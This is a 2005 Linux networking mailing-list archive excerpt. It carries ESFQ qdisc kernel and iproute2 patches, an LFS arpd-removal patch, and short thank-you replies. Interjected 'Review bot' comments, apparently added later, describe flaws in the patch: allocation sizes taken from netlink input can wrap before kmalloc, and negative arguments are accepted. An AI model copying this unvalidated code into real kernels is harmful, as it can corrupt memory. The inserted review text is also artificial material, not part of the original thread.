esfq_hash(q, skb); + unsigned depth = q->depth; + esfq_index x; + + x 
= q->ht[hash]; + if (x == depth) { + q->ht[hash] = x = q->dep[depth].next; + q->hash[x] = hash; + } + __skb_queue_head(&q->qs[x], skb); + esfq_inc(q, x); + if (q->qs[x].qlen == 1) { /* The flow is new */ + if (q->tail == depth) { /* It is the first flow */ + q->tail = x; + q->next[x] = x; + q->allot[x] = q->quantum; + } else { + q->next[x] = q->next[q->tail]; + q->next[q->tail] = x; + q->tail = x; + } + } + if (++sch->q.qlen < q->limit - 1) { + sch->qstats.requeues++; + return 0; + } + + sch->qstats.drops++; + esfq_drop(sch); + return NET_XMIT_CN; +} + + + + +static struct sk_buff * +esfq_dequeue(struct Qdisc* sch) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + struct sk_buff *skb; + unsigned depth = q->depth; + esfq_index a, old_a; + + /* No active slots */ + if (q->tail == depth) + return NULL; + + a = old_a = q->next[q->tail]; + + /* Grab packet */ + skb = __skb_dequeue(&q->qs[a]); + esfq_dec(q, a); + sch->q.qlen--; + + /* Is the slot empty? */ + if (q->qs[a].qlen == 0) { + q->ht[q->hash[a]] = depth; + a = q->next[a]; + if (a == old_a) { + q->tail = depth; + return skb; + } + q->next[q->tail] = a; + q->allot[a] += q->quantum; + } else if ((q->allot[a] -= skb->len) <= 0) { + q->tail = a; + a = q->next[a]; + q->allot[a] += q->quantum; + } + + return skb; +} + +static void +esfq_reset(struct Qdisc* sch) +{ + struct sk_buff *skb; + + while ((skb = esfq_dequeue(sch)) != NULL) + kfree_skb(skb); +} + +static void esfq_perturbation(unsigned long arg) +{ + struct Qdisc *sch = (struct Qdisc*)arg; + struct esfq_sched_data *q = qdisc_priv(sch); + + q->perturbation = net_random()&0x1F; + q->perturb_timer.expires = jiffies + q->perturb_period; + + if (q->perturb_period) { + q->perturb_timer.expires = jiffies + q->perturb_period; + add_timer(&q->perturb_timer); + } +} + +static int esfq_change(struct Qdisc *sch, struct rtattr *opt) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + struct tc_sfq_qopt *ctl = RTA_DATA(opt); + int old_perturb = q->perturb_period; + + if 
(opt->rta_len < RTA_LENGTH(sizeof(*ctl))) + return -EINVAL; + + sch_tree_lock(sch); + q->quantum = ctl->quantum ? : psched_mtu(sch->dev); + q->perturb_period = ctl->perturb_period*HZ; +// q->hash_divisor = ctl->divisor; +// q->tail = q->limit = q->depth = ctl->flows; + + if (ctl->limit) + q->limit = min_t(u32, ctl->limit, q->depth); + + if (ctl->hash_kind) { + q->hash_kind = ctl->hash_kind; + if (q->hash_kind != TCA_SFQ_HASH_CLASSIC) + q->perturb_period = 0; + } + + // is sch_tree_lock enough to do this ? + while (sch->q.qlen >= q->limit-1) + esfq_drop(sch); + + if (old_perturb) + del_timer(&q->perturb_timer); + if (q->perturb_period) { + q->perturb_timer.expires = jiffies + q->perturb_period; + add_timer(&q->perturb_timer); + } else { + q->perturbation = 0; + } + sch_tree_unlock(sch); + return 0; +} + +static int esfq_init(struct Qdisc *sch, struct rtattr *opt) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + struct tc_sfq_qopt *ctl; + esfq_index p = ~0UL/2; + int i; + + if (opt && opt->rta_len < RTA_LENGTH(sizeof(*ctl))) + return -EINVAL; + + init_timer(&q->perturb_timer); + q->perturb_timer.data = (unsigned long)sch; + q->perturb_timer.function = esfq_perturbation; + q->perturbation = 0; + q->hash_kind = TCA_SFQ_HASH_CLASSIC; + q->max_depth = 0; + if (opt == NULL) { + q->quantum = psched_mtu(sch->dev); + q->perturb_period = 0; + q->hash_divisor = 1024; + q->tail = q->limit = q->depth = 128; + + } else { + ctl = RTA_DATA(opt); + q->quantum = ctl->quantum ? : psched_mtu(sch->dev); + q->perturb_period = ctl->perturb_period*HZ; + q->hash_divisor = ctl->divisor ? : 1024; + q->tail = q->limit = q->depth = ctl->flows ? 
: 128; + + if ( q->depth > p - 1 ) + return -EINVAL; + + if (ctl->limit) + q->limit = min_t(u32, ctl->limit, q->depth); + + if (ctl->hash_kind) { + q->hash_kind = ctl->hash_kind; + } + + if (q->perturb_period) { + q->perturb_timer.expires = jiffies + q->perturb_period; + add_timer(&q->perturb_timer); + } + } + + q->ht = kmalloc(q->hash_divisor*sizeof(esfq_index), GFP_KERNEL); + if (!q->ht) + goto err_case; + + q->dep = kmalloc((1+q->depth*2)*sizeof(struct esfq_head), GFP_KERNEL); + if (!q->dep) + goto err_case; + q->next = kmalloc(q->depth*sizeof(esfq_index), GFP_KERNEL); + if (!q->next) + goto err_case; + + q->allot = kmalloc(q->depth*sizeof(short), GFP_KERNEL); + if (!q->allot) + goto err_case; + q->hash = kmalloc(q->depth*sizeof(unsigned short), GFP_KERNEL); + if (!q->hash) + goto err_case; + q->qs = kmalloc(q->depth*sizeof(struct sk_buff_head), GFP_KERNEL); + if (!q->qs) + goto err_case; + + for (i=0; i< q->hash_divisor; i++) + q->ht[i] = q->depth; + for (i=0; idepth; i++) { + skb_queue_head_init(&q->qs[i]); + q->dep[i+q->depth].next = i+q->depth; + q->dep[i+q->depth].prev = i+q->depth; + } + + for (i=0; idepth; i++) + esfq_link(q, i); + return 0; +err_case: + if (q->ht) + kfree(q->ht); + if (q->dep) + kfree(q->dep); + if (q->next) + kfree(q->next); + if (q->allot) + kfree(q->allot); + if (q->hash) + kfree(q->hash); + if (q->qs) + kfree(q->qs); + return -ENOBUFS; +} + +static void esfq_destroy(struct Qdisc *sch) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + del_timer(&q->perturb_timer); + if(q->ht) + kfree(q->ht); + if(q->dep) + kfree(q->dep); + if(q->next) + kfree(q->next); + if(q->allot) + kfree(q->allot); + if(q->hash) + kfree(q->hash); + if(q->qs) + kfree(q->qs); +} + +static int esfq_dump(struct Qdisc *sch, struct sk_buff *skb) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + unsigned char *b = skb->tail; + struct tc_sfq_qopt opt; + + opt.quantum = q->quantum; + opt.perturb_period = q->perturb_period/HZ; + + opt.limit = q->limit; + opt.divisor = 
q->hash_divisor; + opt.flows = q->depth; + opt.hash_kind = q->hash_kind; + + RTA_PUT(skb, TCA_OPTIONS, sizeof(opt), &opt); + + return skb->len; + +rtattr_failure: + skb_trim(skb, b - skb->data); + return -1; +} + +static struct Qdisc_ops esfq_qdisc_ops = +{ + .next = NULL, + .cl_ops = NULL, + .id = "esfq", + .priv_size = sizeof(struct esfq_sched_data), + .enqueue = esfq_enqueue, + .dequeue = esfq_dequeue, + .requeue = esfq_requeue, + .drop = esfq_drop, + .init = esfq_init, + .reset = esfq_reset, + .destroy = esfq_destroy, + .change = NULL, /* esfq_change - needs more work */ + .dump = esfq_dump, + .owner = THIS_MODULE, +}; + +static int __init esfq_module_init(void) +{ + return register_qdisc(&esfq_qdisc_ops); +} +static void __exit esfq_module_exit(void) +{ + unregister_qdisc(&esfq_qdisc_ops); +} +module_init(esfq_module_init) +module_exit(esfq_module_exit) +MODULE_LICENSE("GPL"); --------------010108080506010705020509 Content-Type: text/plain; name="iproute2-2.6.9_041019-remove_db-1.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="iproute2-2.6.9_041019-remove_db-1.patch" Submitted By: Jeremy Utley Date: 2004-11-04 Initial Package Version: 2.6.9-041019 Upstream Status - Not submitted - LFS Specific Origin: Based on inital work by Jim Gifford, ported to apply to the latest version Description: Disables compilation of the arpd program, which requres Berkley DB. diff -Naur iproute2-2.6.9/misc/Makefile iproute2-2.6.9-new/misc/Makefile --- iproute2-2.6.9/misc/Makefile 2004-10-19 20:49:02.000000000 +0000 +++ iproute2-2.6.9-new/misc/Makefile 2004-11-04 19:14:43.704002010 +0000 @@ -1,7 +1,7 @@ SSOBJ=ss.o ssfilter.o LNSTATOBJ=lnstat.o lnstat_util.o -TARGETS=ss nstat ifstat rtacct arpd lnstat +TARGETS=ss nstat ifstat rtacct lnstat include ../Config 
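Review bot: the TARGETS line in the first hunk of misc/Makefile drops arpd unconditionally, so a host that does have Berkeley DB (db_185.h) also loses arpd once this is applied. Consider building arpd only when the header is found, or say in the patch header that the patch should be skipped on systems where Berkeley DB is installed.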
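Review bot: esfq_init() in the new net/sched/sch_esfq.c uses ctl->flows and ctl->divisor from the netlink attribute as allocation sizes and as a hash mask with almost no validation. The only bound on depth is "if ( q->depth > p - 1 )" with p = ~0UL/2, so "(1+q->depth*2)*sizeof(struct esfq_head)" and the other "q->depth*sizeof(...)" products can wrap in unsigned arithmetic and give kmalloc a size smaller than the initialisation loops that follow will write. hash_divisor is never checked to be a power of two although both hash helpers reduce with "h & (q->hash_divisor-1)", and slot hashes are kept in an unsigned short array, which cannot hold values from a divisor above 65536. Suggest rejecting out-of-range depth and divisor (and non-power-of-two divisors) with -EINVAL before the first kmalloc instead of relying on the "< 15" check in tc. Separately, err_case frees the arrays but does not del_timer() the perturb timer that the else branch may already have armed with add_timer().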
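Review bot: esfq_parse_opt() in tc/q_esfq.c passes &opt.flows, &opt.divisor and &opt.limit to get_integer(), which parses a signed int, while those fields are declared unsigned or __u32 in struct tc_sfq_qopt. A negative argument is therefore accepted and sent to the kernel as a very large value; only divisor has an upper bound (">= 15") and nothing has a lower one. Suggest get_unsigned() plus explicit range checks for depth and limit. For the divisor, "opt.divisor=pow(2,opt.divisor)" pulls in floating point for what is a shift; 1 << opt.divisor says the same thing. The "#define usage() return(-1)" macro is never used and can go.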
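Review bot: the "@@ -133,6 +140,7 @@" hunk of the iproute2 include/linux/pkt_sched.h (and its kernel twin at "@@ -136,6 +143,7 @@") appends hash_kind to the existing struct tc_sfq_qopt rather than to a new structure, which changes the size of the option block shared with the stock sfq qdisc. esfq_print_opt() and esfq_init() both compare the attribute length against sizeof(struct tc_sfq_qopt); if the sfq code does the same, a patched tc talking to an unpatched kernel (or the reverse) will disagree on the payload length. Suggest giving esfq its own option struct so that the sfq userspace interface stays as it was.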
@@ -18,9 +18,6 @@ rtacct: rtacct.c $(CC) $(CFLAGS) $(LDFLAGS) -o rtacct rtacct.c $(LIBNETLINK) -lm -arpd: arpd.c - $(CC) $(CFLAGS) -I$(DBM_INCLUDE) $(LDFLAGS) -o arpd arpd.c $(LIBNETLINK) -ldb -lpthread - ssfilter.c: ssfilter.y bison ssfilter.y -o ssfilter.c
--------------010108080506010705020509--

From CARRIGB@ITCARLOW.IE Tue Jan 11 15:33:59 2005
From: CARRIGB@ITCARLOW.IE (Brian Carrig)
Date: Tue, 11 Jan 2005 15:33:59 -0000
Subject: [LARTC] ESFQ?
In-Reply-To: <41E3F088.6060708@dsl.pipex.com>
References: <41DBA952.5010203@expertron.co.za>
Message-ID: <41E3F1E7.20214.1145005@ITCARLOW.IE>

Cheers Andy, great work.

Brian

On 11 Jan 2005 at 15:28, Andy Furniss wrote:

> Justin Schoeman wrote:
> > Woohoo - that would be great!
> >
> > -justin
> >
> > Andy Furniss wrote:
> >
> >> Justin Schoeman wrote:
> >>
> >>> Ouch... Is there any other way to do host-based fair sharing
> >>> (well, other than actually classifying each host :-( )?
> >>
> >>
> >>
> >> I don't think it will take much to get it to work - though I
> >> haven't tried :-) .
> >>
> >> I'll have a look at doing a 2.6.10 in the next few days.
>
> Well I gave it a go (first patches I've made) and they work for me
> though Thomas or Stephen may notice something :-) .
>
> Hopefully they won't be needed in the future if Thomas gets esfq in
> mainline.
>
> They are based on Alexander Clouters patches at www.digriz.org.uk. I
> only used the first iproute one.
>
> I was hampered a bit because kernel.org have turned off the diff
> viewer.
>
> The remove db iproute patch is from LFS, you may not need it if you
> have Berkeley DB installed ( search for db_185.h ).
>
> If you don't have it *and* you don't use arpd then use the patch, it
> just removes arpd from the build.
>
> Andy.
>
>

--
Brian Carrig
Research Assistant
Department of Computing & Networking
Institute of Technology, Carlow
Tel. No.: +353 59 9176314

From justin@expertron.co.za Tue Jan 11 15:51:26 2005
From: justin@expertron.co.za (Justin Schoeman)
Date: Tue, 11 Jan 2005 17:51:26 +0200
Subject: [LARTC] ESFQ?
In-Reply-To: <41E3F088.6060708@dsl.pipex.com>
References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za> <41E3F088.6060708@dsl.pipex.com>
Message-ID: <41E3F5FE.3000703@expertron.co.za>

Thanks - really appreciate the help!

-justin

Andy Furniss wrote:
> Justin Schoeman wrote:
>
>> Woohoo - that would be great!
>>
>> -justin
>>
>> Andy Furniss wrote:
>>
>>> Justin Schoeman wrote:
>>>
>>>> Ouch... Is there any other way to do host-based fair sharing (well,
>>>> other than actually classifying each host :-( )?
>>>
>>>
>>>
>>>
>>> I don't think it will take much to get it to work - though I haven't
>>> tried :-) .
>>>
>>> I'll have a look at doing a 2.6.10 in the next few days.
>
>
> Well I gave it a go (first patches I've made) and they work for me
> though Thomas or Stephen may notice something :-) .
>
> Hopefully they won't be needed in the future if Thomas gets esfq in
> mainline.
>
> They are based on Alexander Clouters patches at www.digriz.org.uk. I
> only used the first iproute one.
>
> I was hampered a bit because kernel.org have turned off the diff viewer.
>
> The remove db iproute patch is from LFS, you may not need it if you have
> Berkeley DB installed ( search for db_185.h ).
>
> If you don't have it *and* you don't use arpd then use the patch, it
> just removes arpd from the build.
>
> Andy.
>
>
>
> ------------------------------------------------------------------------
>
> diff -urN iproute2-2.6.9.orig/include/linux/pkt_sched.h iproute2-2.6.9/include/linux/pkt_sched.h > --- iproute2-2.6.9.orig/include/linux/pkt_sched.h 2004-10-19 21:49:02.000000000 +0100 > +++ iproute2-2.6.9/include/linux/pkt_sched.h 2005-01-11 11:46:45.395401296 +0000
> @@ -126,6 +126,13 @@ > > /* SFQ section */ > > +enum > +{ > + TCA_SFQ_HASH_CLASSIC, > + TCA_SFQ_HASH_DST, > + TCA_SFQ_HASH_SRC, > +}; > + > struct tc_sfq_qopt > { > unsigned quantum; /* Bytes per round allocated to flow */ > @@ -133,6 +140,7 @@ > __u32 limit; /* Maximal packets in queue */ > unsigned divisor; /* Hash divisor */ > unsigned flows; /* Maximal number of flows */ > + unsigned hash_kind; /* Hash function to use for flow identification */ > }; > > /* > @@ -142,6 +150,8 @@ > * > * The only reason for this is efficiency, it is possible > * to change these parameters in compile time. > + * > + * If you need to play with this values use esfq > */ > > /* RED section */ > diff -urN iproute2-2.6.9.orig/tc/Makefile iproute2-2.6.9/tc/Makefile > --- iproute2-2.6.9.orig/tc/Makefile 2004-10-19 21:49:02.000000000 +0100 > +++ iproute2-2.6.9/tc/Makefile 2005-01-11 11:46:45.396401144 +0000 > @@ -6,6 +6,7 @@ > TCMODULES := > TCMODULES += q_fifo.o > TCMODULES += q_sfq.o > +TCMODULES += q_esfq.o > TCMODULES += q_red.o > TCMODULES += q_prio.o > TCMODULES += q_tbf.o > diff -urN iproute2-2.6.9.orig/tc/q_esfq.c iproute2-2.6.9/tc/q_esfq.c > --- iproute2-2.6.9.orig/tc/q_esfq.c 1970-01-01 01:00:00.000000000 +0100 > +++ iproute2-2.6.9/tc/q_esfq.c 2005-01-11 11:47:29.424707824 +0000 
> @@ -0,0 +1,168 @@ > +/* > + * q_esfq.c ESFQ. > + * > + * This program is free software; you can redistribute it and/or > + * modify it under the terms of the GNU General Public License > + * as published by the Free Software Foundation; either version > + * 2 of the License, or (at your option) any later version. > + * > + * Authors: Alexey Kuznetsov, > + * > + * Changes: Alexander Atanasov, > + * Added depth,limit,divisor,hash_kind options. > + */ > + > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > + > +#include "utils.h" > +#include "tc_util.h" > + > +static void explain(void) > +{ > + fprintf(stderr, "Usage: ... esfq [ perturb SECS ] [ quantum BYTES ] [ depth FLOWS ]\n\t[ divisor HASHBITS ] [ limit PKTS ] [ hash HASHTYPE]\n"); > + fprintf(stderr,"Where: \n"); > + fprintf(stderr,"HASHTYPE := { classic | src | dst }\n"); > +} > + > +#define usage() return(-1) > + > +static int esfq_parse_opt(struct qdisc_util *qu, int argc, char **argv, struct nlmsghdr *n) > +{ > + int ok=0; > + struct tc_sfq_qopt opt; > + > + memset(&opt, 0, sizeof(opt)); > + > + opt.hash_kind= TCA_SFQ_HASH_CLASSIC; > + > + while (argc > 0) { > + if (strcmp(*argv, "quantum") == 0) { > + NEXT_ARG(); > + if (get_size(&opt.quantum, *argv)) { > + fprintf(stderr, "Illegal \"quantum\"\n"); > + return -1; > + } > + ok++; > + } else if (strcmp(*argv, "perturb") == 0) { > + NEXT_ARG(); > + if (get_integer(&opt.perturb_period, *argv, 0)) { > + fprintf(stderr, "Illegal \"perturb\"\n"); > + return -1; > + } > + ok++; > + } else if (strcmp(*argv, "depth") == 0) { > + NEXT_ARG(); > + if (get_integer(&opt.flows, *argv, 0)) { > + fprintf(stderr, "Illegal \"depth\"\n"); > + return -1; > + } > + ok++; > + } else if (strcmp(*argv, "divisor") == 0) { > + NEXT_ARG(); > + if (get_integer(&opt.divisor, *argv, 0)) { > + fprintf(stderr, "Illegal \"divisor\"\n"); > + return -1; > + } > + if(opt.divisor >= 15) { > + fprintf(stderr, "Illegal 
\"divisor\" must be < 15\n"); > + return -1; > + } > + opt.divisor=pow(2,opt.divisor); > + ok++; > + } else if (strcmp(*argv, "limit") == 0) { > + NEXT_ARG(); > + if (get_integer(&opt.limit, *argv, 0)) { > + fprintf(stderr, "Illegal \"limit\"\n"); > + return -1; > + } > + ok++; > + } else if (strcmp(*argv, "hash") == 0) { > + NEXT_ARG(); > + if(strcmp(*argv,"classic") == 0) { > + opt.hash_kind= TCA_SFQ_HASH_CLASSIC; > + } else > + if(strcmp(*argv,"dst") == 0) { > + opt.hash_kind= TCA_SFQ_HASH_DST; > + } else > + if(strcmp(*argv,"src") == 0) { > + opt.hash_kind= TCA_SFQ_HASH_SRC; > + } else { > + fprintf(stderr, "Illegal \"hash\"\n"); > + explain(); > + return -1; > + } > + ok++; > + } else if (strcmp(*argv, "help") == 0) { > + explain(); > + return -1; > + } else { > + fprintf(stderr, "What is \"%s\"?\n", *argv); > + explain(); > + return -1; > + } > + argc--; argv++; > + } > + > + if (ok) > + addattr_l(n, 1024, TCA_OPTIONS, &opt, sizeof(opt)); > + return 0; > +} > + > +static int esfq_print_opt(struct qdisc_util *qu, FILE *f, struct rtattr *opt) > +{ > + struct tc_sfq_qopt *qopt; > + SPRINT_BUF(b1); > + > + if (opt == NULL) > + return 0; > + > + if (RTA_PAYLOAD(opt) < sizeof(*qopt)) > + return -1; > + qopt = RTA_DATA(opt); > + fprintf(f, "quantum %s ", sprint_size(qopt->quantum, b1)); > + if (show_details) { > + fprintf(f, "limit %up flows %u/%u ", > + qopt->limit, qopt->flows, qopt->divisor); > + } > + if (qopt->perturb_period) > + fprintf(f, "perturb %dsec ", qopt->perturb_period); > + > + fprintf(f,"hash: "); > + switch(qopt->hash_kind) > + { > + case TCA_SFQ_HASH_CLASSIC: > + fprintf(f,"classic"); > + break; > + case TCA_SFQ_HASH_DST: > + fprintf(f,"dst"); > + break; > + case TCA_SFQ_HASH_SRC: > + fprintf(f,"src"); > + break; > + default: > + fprintf(f,"Unknown"); > + } > + return 0; > +} > + > +static int esfq_print_xstats(struct qdisc_util *qu, FILE *f, struct rtattr *xstats) > +{ > + return 0; > +} > + > + > +struct qdisc_util esfq_qdisc_util = { > + .id = 
"esfq", > + .parse_qopt = esfq_parse_opt, > + .print_qopt = esfq_print_opt, > + .print_xstats = esfq_print_xstats, > +}; > > > ------------------------------------------------------------------------ > > diff -urN linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h > --- linux-2.6.10.orig/include/linux/pkt_sched.h Fri Dec 24 21:35:23 2004 > +++ linux-2.6.10/include/linux/pkt_sched.h Mon Jan 10 15:32:43 2005 > @@ -129,6 +129,13 @@ > > /* SFQ section */ > > +enum > +{ > + TCA_SFQ_HASH_CLASSIC, > + TCA_SFQ_HASH_DST, > + TCA_SFQ_HASH_SRC, > +}; > + > struct tc_sfq_qopt > { > unsigned quantum; /* Bytes per round allocated to flow */ > @@ -136,6 +143,7 @@ > __u32 limit; /* Maximal packets in queue */ > unsigned divisor; /* Hash divisor */ > unsigned flows; /* Maximal number of flows */ > + unsigned hash_kind; /* Hash function to use for flow identification */ > }; > > /* > @@ -145,6 +153,8 @@ > * > * The only reason for this is efficiency, it is possible > * to change these parameters in compile time. > + * > + * If you need to play with this values use esfq. > */ > > /* RED section */ > diff -urN linux-2.6.10.orig/net/sched/Kconfig linux-2.6.10/net/sched/Kconfig > --- linux-2.6.10.orig/net/sched/Kconfig Fri Dec 24 21:35:27 2004 > +++ linux-2.6.10/net/sched/Kconfig Mon Jan 10 15:32:43 2005 
> @@ -154,6 +154,24 @@ > To compile this code as a module, choose M here: the > module will be called sch_sfq. > > +config NET_SCH_ESFQ > + tristate "ESFQ queue" > + depends on NET_SCHED > + ---help--- > + Say Y here if you want to use the Enhanced Stochastic Fairness > + Queueing (ESFQ) packet scheduling algorithm for some of your network > + devices or as a leaf discipline for the CBQ scheduling algorithm (see > + the top of for details and references > + about the SFQ algorithm). > + > + This is an enchanced SFQ version which allows you to control the > + hardcoded values in the SFQ scheduler: queue depth, hash table size, > + queues limit. Also adds control to the hash function used to identify > + packet flows. Hash by src or dst ip and original sfq hash. > + > + To compile this code as a module, choose M here: the > + module will be called sch_esfq. > + > config NET_SCH_TEQL > tristate "TEQL queue" > depends on NET_SCHED > diff -urN linux-2.6.10.orig/net/sched/Makefile linux-2.6.10/net/sched/Makefile > --- linux-2.6.10.orig/net/sched/Makefile Fri Dec 24 21:34:45 2004 > +++ linux-2.6.10/net/sched/Makefile Mon Jan 10 15:32:43 2005 > @@ -22,6 +22,7 @@ > obj-$(CONFIG_NET_SCH_INGRESS) += sch_ingress.o > obj-$(CONFIG_NET_SCH_DSMARK) += sch_dsmark.o > obj-$(CONFIG_NET_SCH_SFQ) += sch_sfq.o > +obj-$(CONFIG_NET_SCH_ESFQ) += sch_esfq.o > obj-$(CONFIG_NET_SCH_TBF) += sch_tbf.o > obj-$(CONFIG_NET_SCH_TEQL) += sch_teql.o > obj-$(CONFIG_NET_SCH_PRIO) += sch_prio.o > diff -urN linux-2.6.10.orig/net/sched/sch_esfq.c linux-2.6.10/net/sched/sch_esfq.c > --- linux-2.6.10.orig/net/sched/sch_esfq.c Thu Jan 1 01:00:00 1970 > +++ linux-2.6.10/net/sched/sch_esfq.c Mon Jan 10 22:40:09 2005 
> @@ -0,0 +1,585 @@ > +/* > + * net/sched/sch_esfq.c Extended Stochastic Fairness Queueing discipline. > + * > + * This program is free software; you can redistribute it and/or > + * modify it under the terms of the GNU General Public License > + * as published by the Free Software Foundation; either version > + * 2 of the License, or (at your option) any later version. > + * > + * Authors: Alexey Kuznetsov, > + * > + * Changes: Alexander Atanasov, > + * Added dynamic depth,limit,divisor,hash_kind options. > + * Added dst and src hashes. > + */ > + > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > + > + > +/* Stochastic Fairness Queuing algorithm. > + For more comments look at sch_sfq.c. > + The difference is that you can change limit, depth, > + hash table size and choose 3 hash types. > + > + classic: same as in sch_sfq.c > + dst: destination IP address > + src: source IP address > + > + TODO: > + make sfq_change work. 
> +*/ > + > + > +/* This type should contain at least SFQ_DEPTH*2 values */ > +typedef unsigned int esfq_index; > + > +struct esfq_head > +{ > + esfq_index next; > + esfq_index prev; > +}; > + > +struct esfq_sched_data > +{ > +/* Parameters */ > + int perturb_period; > + unsigned quantum; /* Allotment per round: MUST BE >= MTU */ > + int limit; > + unsigned depth; > + unsigned hash_divisor; > + unsigned hash_kind; > +/* Variables */ > + struct timer_list perturb_timer; > + int perturbation; > + esfq_index tail; /* Index of current slot in round */ > + esfq_index max_depth; /* Maximal depth */ > + > + esfq_index *ht; /* Hash table */ > + esfq_index *next; /* Active slots link */ > + short *allot; /* Current allotment per slot */ > + unsigned short *hash; /* Hash value indexed by slots */ > + struct sk_buff_head *qs; /* Slot queue */ > + struct esfq_head *dep; /* Linked list of slots, indexed by depth */ > +}; > + > +static __inline__ unsigned esfq_hash_u32(struct esfq_sched_data *q,u32 h) > +{ > + int pert = q->perturbation; > + > + if (pert) > + h = (h<>(0x1F - pert)); > + > + h = ntohl(h) * 2654435761UL; > + return h & (q->hash_divisor-1); > +} > + > +static __inline__ unsigned esfq_fold_hash_classic(struct esfq_sched_data *q, u32 h, u32 h1) > +{ > + int pert = q->perturbation; > + > + /* Have we any rotation primitives? If not, WHY? 
*/ > + h ^= (h1<>(0x1F - pert)); > + h ^= h>>10; > + return h & (q->hash_divisor-1); > +} > + > +static unsigned esfq_hash(struct esfq_sched_data *q, struct sk_buff *skb) > +{ > + u32 h, h2; > + u32 hs; > + > + switch (skb->protocol) { > + case __constant_htons(ETH_P_IP): > + { > + struct iphdr *iph = skb->nh.iph; > + h = iph->daddr; > + hs = iph->saddr; > + h2 = hs^iph->protocol; > + if (!(iph->frag_off&htons(IP_MF|IP_OFFSET)) && > + (iph->protocol == IPPROTO_TCP || > + iph->protocol == IPPROTO_UDP || > + iph->protocol == IPPROTO_ESP)) > + h2 ^= *(((u32*)iph) + iph->ihl); > + break; > + } > + case __constant_htons(ETH_P_IPV6): > + { > + struct ipv6hdr *iph = skb->nh.ipv6h; > + h = iph->daddr.s6_addr32[3]; > + hs = iph->saddr.s6_addr32[3]; > + h2 = hs^iph->nexthdr; > + if (iph->nexthdr == IPPROTO_TCP || > + iph->nexthdr == IPPROTO_UDP || > + iph->nexthdr == IPPROTO_ESP) > + h2 ^= *(u32*)&iph[1]; > + break; > + } > + default: > + h = (u32)(unsigned long)skb->dst; > + hs = (u32)(unsigned long)skb->sk; > + h2 = hs^skb->protocol; > + } > + switch(q->hash_kind) > + { > + case TCA_SFQ_HASH_CLASSIC: > + return esfq_fold_hash_classic(q, h, h2); > + case TCA_SFQ_HASH_DST: > + return esfq_hash_u32(q,h); > + case TCA_SFQ_HASH_SRC: > + return esfq_hash_u32(q,hs); > + default: > + if (net_ratelimit()) > + printk(KERN_DEBUG "esfq unknown hash method, fallback to classic\n"); > + } > + return esfq_fold_hash_classic(q, h, h2); > +} > + > +static inline void esfq_link(struct esfq_sched_data *q, esfq_index x) > +{ > + esfq_index p, n; > + int d = q->qs[x].qlen + q->depth; > + > + p = d; > + n = q->dep[d].next; > + q->dep[x].next = n; > + q->dep[x].prev = p; > + q->dep[p].next = q->dep[n].prev = x; > +} > + > +static inline void esfq_dec(struct esfq_sched_data *q, esfq_index x) > +{ > + esfq_index p, n; > + > + n = q->dep[x].next; > + p = q->dep[x].prev; > + q->dep[p].next = n; > + q->dep[n].prev = p; > + > + if (n == p && q->max_depth == q->qs[x].qlen + 1) > + q->max_depth--; > + > 
+ esfq_link(q, x); > +} > + > +static inline void esfq_inc(struct esfq_sched_data *q, esfq_index x) > +{ > + esfq_index p, n; > + int d; > + > + n = q->dep[x].next; > + p = q->dep[x].prev; > + q->dep[p].next = n; > + q->dep[n].prev = p; > + d = q->qs[x].qlen; > + if (q->max_depth < d) > + q->max_depth = d; > + > + esfq_link(q, x); > +} > + > +static unsigned int esfq_drop(struct Qdisc *sch) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + esfq_index d = q->max_depth; > + struct sk_buff *skb; > + unsigned int len; > + > + /* Queue is full! Find the longest slot and > + drop a packet from it */ > + > + if (d > 1) { > + esfq_index x = q->dep[d+q->depth].next; > + skb = q->qs[x].prev; > + len = skb->len; > + __skb_unlink(skb, &q->qs[x]); > + kfree_skb(skb); > + esfq_dec(q, x); > + sch->q.qlen--; > + sch->qstats.drops++; > + return len; > + } > + > + if (d == 1) { > + /* It is difficult to believe, but ALL THE SLOTS HAVE LENGTH 1. */ > + d = q->next[q->tail]; > + q->next[q->tail] = q->next[d]; > + q->allot[q->next[d]] += q->quantum; > + skb = q->qs[d].prev; > + len = skb->len; > + __skb_unlink(skb, &q->qs[d]); > + kfree_skb(skb); > + esfq_dec(q, d); > + sch->q.qlen--; > + q->ht[q->hash[d]] = q->depth; > + sch->qstats.drops++; > + return len; > + } > + > + return 0; > +} > + > +static int > +esfq_enqueue(struct sk_buff *skb, struct Qdisc* sch) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + unsigned hash = esfq_hash(q, skb); > + unsigned depth = q->depth; > + esfq_index x; > + > + x = q->ht[hash]; > + if (x == depth) { > + q->ht[hash] = x = q->dep[depth].next; > + q->hash[x] = hash; > + } > + __skb_queue_tail(&q->qs[x], skb); > + esfq_inc(q, x); > + if (q->qs[x].qlen == 1) { /* The flow is new */ > + if (q->tail == depth) { /* It is the first flow */ > + q->tail = x; > + q->next[x] = x; > + q->allot[x] = q->quantum; > + } else { > + q->next[x] = q->next[q->tail]; > + q->next[q->tail] = x; > + q->tail = x; > + } > + } > + if (++sch->q.qlen < q->limit-1) 
